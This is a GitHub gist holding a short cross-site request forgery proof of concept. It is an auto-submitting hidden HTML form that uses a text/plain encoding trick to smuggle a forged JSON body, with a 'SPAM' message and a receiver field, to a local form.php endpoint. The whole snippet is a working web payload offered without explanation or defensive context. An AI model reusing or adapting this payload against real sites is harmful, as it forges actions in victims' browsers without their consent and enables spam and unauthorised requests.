Created
May 28, 2017 13:11
-
-
Save vporoshok/5c2514f116b14036a7c9e1cb57ac87d8 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form id="form" method="post" action="http://localhost:4000/form.php" enctype="text/plain"> | |
<input name='{"equals":"' value='", "message": "SPAM", "receiver": "[email protected]"}'> | |
</form> | |
<script> | |
var form = document.getElementById('form'); | |
form.submit(); | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment